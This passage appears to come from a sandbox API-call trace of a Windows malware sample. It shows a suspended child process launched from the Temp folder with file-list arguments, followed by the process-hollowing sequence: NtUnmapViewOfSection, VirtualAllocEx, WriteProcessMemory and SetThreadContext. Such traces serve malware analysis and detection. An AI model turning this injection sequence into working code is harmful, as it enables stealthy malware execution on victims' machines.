lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.352] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.353] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.354] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.354] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.354] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.354] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.354] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0114.007] VirtualProtect (in: lpAddress=0x193660, dwSize=0x564a0, flNewProtect=0x40, lpflOldProtect=0x12fe48 | out: lpflOldProtect=0x12fe48*=0x4) returned 1 [0114.008] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0114.008] LoadLibraryA (lpLibFileName="user32") returned 0x76b40000 [0114.008] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxA") returned 0x76b9ea11 [0114.008] LoadLibraryA (lpLibFileName="kernel32") returned 0x76910000 [0114.008] GetProcAddress (hModule=0x76910000, lpProcName="WinExec") returned 0x7699e5fd [0114.008] GetProcAddress (hModule=0x76910000, lpProcName="CreateFileA") returned 0x7695cee8 [0114.008] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0114.008] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0114.009] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessA") returned 0x76912082 [0114.009] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadContext") returned 0x76970cc1 [0114.009] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAlloc") returned 0x76962fb6 [0114.009] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAllocEx") returned 0x7694c1b6 [0114.009] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0114.009] GetProcAddress (hModule=0x76910000, lpProcName="ReadProcessMemory") returned 0x7694c1ce [0114.009] GetProcAddress (hModule=0x76910000, lpProcName="WriteProcessMemory") returned 0x7694c1de [0114.009] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadContext") returned 0x769a0193 [0114.009] GetProcAddress (hModule=0x76910000, lpProcName="ResumeThread") returned 0x76950f1c [0114.009] GetProcAddress (hModule=0x76910000, lpProcName="WaitForSingleObject") returned 0x7695ba90 [0114.009] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameA") returned 0x769633f6 [0114.009] GetProcAddress (hModule=0x76910000, lpProcName="GetCommandLineA") returned 0x769698ff [0114.009] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77230000 [0114.009] GetProcAddress (hModule=0x77230000, lpProcName="NtUnmapViewOfSection") returned 0x772769b8 [0114.009] GetProcAddress (hModule=0x76b40000, lpProcName="RegisterClassExA") returned 0x76b46293 [0114.009] GetProcAddress (hModule=0x76b40000, lpProcName="CreateWindowExA") returned 0x76b4bf40 [0114.009] GetProcAddress (hModule=0x76b40000, lpProcName="PostMessageA") returned 0x76b4b446 [0114.009] GetProcAddress (hModule=0x76b40000, lpProcName="GetMessageA") returned 0x76b51899 [0114.009] GetProcAddress (hModule=0x76b40000, lpProcName="DefWindowProcA") returned 0x76b4bb1c [0114.009] RegisterClassExA (param_1=0x12fbc0) returned 0xc13d [0114.950] CreateWindowExA (dwExStyle=0x200, lpClassName="bxVV7cGHPHusOnmHbFKqGnzKMpomaw", lpWindowName="ptodEzQlWskupc762Nhc3wjD8apfHQ", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=1000, nHeight=1000, hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0x0) returned 0x70140 [0114.965] PostMessageA (hWnd=0x70140, Msg=0x400, wParam=0x64, lParam=0x1f4) returned 1 [0114.965] GetMessageA (in: lpMsg=0x12fbf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x12fbf0) returned 1 [0114.965] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x1000, flProtect=0x4) returned 0x160000 [0114.965] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x160000, nSize=0x2800 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\gym4nxcu.exe")) returned 0x30 [0114.966] GetCommandLineA () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"" [0114.966] CreateProcessA (in: lpApplicationName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe", lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12faf0*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb48 | out: lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"", lpProcessInformation=0x12fb48*(hProcess=0x4c, hThread=0x48, dwProcessId=0xdf4, dwThreadId=0xdf8)) returned 1 [0114.968] VirtualFree (lpAddress=0x160000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0114.968] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x4) returned 0x160000 [0114.968] GetThreadContext (in: hThread=0x48, lpContext=0x160000 | out: lpContext=0x160000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffdf000, Edx=0x0, Ecx=0x0, Eax=0x402581, Ebp=0x0, Eip=0x77277098, SegCs=0x1b, EFlags=0x200, Esp=0x12fff0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0115.156] ReadProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x7ffdf008, lpBuffer=0x12fb3c, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12fb3c*, lpNumberOfBytesRead=0x0) returned 1 [0115.156] NtUnmapViewOfSection (ProcessHandle=0x4c, BaseAddress=0x400000) returned 0x0 [0115.156] VirtualAllocEx (hProcess=0x4c, lpAddress=0x400000, dwSize=0x11d000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0115.157] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x400000, lpBuffer=0x194900*, nSize=0x1000, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x194900*, lpNumberOfBytesWritten=0x0) returned 1 [0115.157] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x401000, lpBuffer=0x194d00, nSize=0x0, lpNumberOfBytesWritten=0x0 | out: lpNumberOfBytesWritten=0x0) returned 0 [0115.157] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x4c7000, lpBuffer=0x194d00*, nSize=0x54600, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x194d00*, lpNumberOfBytesWritten=0x0) returned 1 [0115.164] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x51c000, lpBuffer=0x1e9300*, nSize=0x800, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x1e9300*, lpNumberOfBytesWritten=0x0) returned 1 [0115.165] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x7ffdf008, lpBuffer=0x194a34*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x194a34*, lpNumberOfBytesWritten=0x0) returned 1 [0115.165] SetThreadContext (hThread=0x48, lpContext=0x160000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffdf000, Edx=0x0, Ecx=0x0, Eax=0x51b2d0, Ebp=0x0, Eip=0x77277098, SegCs=0x1b, EFlags=0x200, Esp=0x12fff0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, 